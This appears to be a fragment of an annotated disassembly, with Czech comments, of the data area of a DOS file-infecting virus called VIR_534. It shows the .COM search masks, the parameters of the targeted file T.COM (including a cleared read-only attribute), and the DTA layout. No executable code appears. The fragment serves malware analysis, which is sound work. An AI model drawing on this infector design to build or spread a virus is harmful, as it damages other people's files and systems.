; infikovaneho programu T.COM
;Specifikace a parametry souboru na ktery se pripoji VIR_534
156A:1279 \????????.COM00;+6 specifikace souboru ASCIIZ pro hl.adresar
156A:127A ????????.COM00 ;+7 specifikace souboru ASCIIZ pro akt.adresar
156A:1287 T.COM00 ;+14 nazev vyhledaneho souboru ASCIIZ (\T.COM)
156A:1295 2000 ;+22 atribut vyhledaneho souboru - zrusen RO
156A:1297 6507 ;+24 cas vyhledaneho souboru
156A:1299 2100 ;+26 datum vyhledaneho souboru
156A:129B 0000
156A:129D 0000
;------------------------------------------------------------------------------
; DTA pro program VIRu_534.
;------------------------------------------------------------------------------
;15H byte pro dalsi cteni souboru
156A:129F 01
156A:12A1 ????????COM
156A:12AB 0304
156A:12AD 0000
156A:12AF 0000
156A:12B1 0000
156A:12B3 00
;Oblast [DTA + 15H] - parametry nacteneho souboru
156A:12B4 20 ;+15 atributy souboru
156A:12B5 6507 ;+16 cas vytvoreni souboru
156A:12B7 2100 ;+18 datum vytvoreni souboru
156A:12B9 0E10 ;+1A velikost souboru - nizsi cast
156A:12BB 0000 ;+1C velikost souboru - vyssi cast
156A:12BD T.COM00 ;+1E nazev souboru.typ (mezery vypusteny)
156A:12C8 ..osoftyright Microsoftyright Microsoftyright Microsofty
156A:1300 right Microsoftyright Microsoft
156A:1320 1988

Copy Permalink